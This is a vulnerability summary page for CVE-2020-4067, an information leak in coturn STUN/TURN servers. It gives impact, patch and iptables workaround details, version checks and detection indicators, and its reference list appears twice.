CVE-2020-4067
📋 TL;DR
CVE-2020-4067 is an information disclosure vulnerability in coturn STUN/TURN servers where uninitialized memory buffers allow attackers to leak data from other client connections. Attackers can query the server to extract sensitive information from padding bytes of other clients' sessions. This affects all coturn servers running versions before 4.5.1.3.
💻 Affected Systems
- coturn
📦 What is this software?
Coturn by Coturn Project
Fedora by Fedoraproject
Fedora by Fedoraproject
Leap by Opensuse
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Attackers could extract authentication tokens, session identifiers, or other sensitive data from other clients' connections, potentially leading to account takeover or session hijacking.
Likely Case
Information leakage of random memory contents from other client sessions, which could include partial authentication data or connection metadata.
If Mitigated
Limited impact if proper network segmentation and access controls prevent unauthorized clients from reaching the coturn server.
🎯 Exploit Status
Exploitation requires network access to the coturn server but no authentication. The vulnerability is well-documented in security advisories.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.5.1.3
Vendor Advisory: https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm
Restart Required: Yes
Instructions:
1. Stop the coturn service. 2. Update to version 4.5.1.3 or later using your package manager or compile from source. 3. Restart the coturn service. 4. Verify the new version is running.
🔧 Temporary Workarounds
Network Access Restriction
linuxRestrict network access to coturn servers to only trusted clients and networks.
iptables -A INPUT -p tcp --dport 3478 -s trusted_network -j ACCEPT
iptables -A INPUT -p udp --dport 3478 -s trusted_network -j ACCEPT
iptables -A INPUT -p tcp --dport 3478 -j DROP
iptables -A INPUT -p udp --dport 3478 -j DROP
🧯 If You Can't Patch
- Implement strict network segmentation to isolate coturn servers from untrusted networks
- Monitor coturn logs for unusual connection patterns or repeated queries from single sources
🔍 How to Verify
Check if Vulnerable:
Check coturn version with 'turnserver -v' or 'coturn --version' and compare against 4.5.1.3Check Version:
turnserver -v 2>&1 | head -1Verify Fix Applied:
Confirm version is 4.5.1.3 or higher and test STUN/TURN functionality remains operational📡 Detection & Monitoring
Log Indicators:
- Unusual volume of STUN/TURN requests from single IP addresses
- Repeated connection attempts with varying parameters
Network Indicators:
- High volume of STUN/TURN traffic to single endpoints
- Patterns of repeated queries with small variations
SIEM Query:
source="coturn.log" | stats count by src_ip | where count > threshold🔗 References
- http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00010.html
- https://github.com/coturn/coturn/blob/aab60340b201d55c007bcdc853230f47aa2dfdf1/ChangeLog#L15
- https://github.com/coturn/coturn/issues/583
- https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm
- https://lists.debian.org/debian-lts-announce/2020/07/msg00002.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5G35UBNSRLL6SYRTODYTMBJ65TLQILUM/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNJJO77ZLGGFJWNUGP6VDG5HPAC5UDBK/
- https://usn.ubuntu.com/4415-1/
- https://www.debian.org/security/2020/dsa-4711
- http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00010.html
- https://github.com/coturn/coturn/blob/aab60340b201d55c007bcdc853230f47aa2dfdf1/ChangeLog#L15
- https://github.com/coturn/coturn/issues/583
- https://github.com/coturn/coturn/security/advisories/GHSA-c8r8-8vp5-6gcm
- https://lists.debian.org/debian-lts-announce/2020/07/msg00002.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5G35UBNSRLL6SYRTODYTMBJ65TLQILUM/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNJJO77ZLGGFJWNUGP6VDG5HPAC5UDBK/
- https://usn.ubuntu.com/4415-1/
- https://www.debian.org/security/2020/dsa-4711
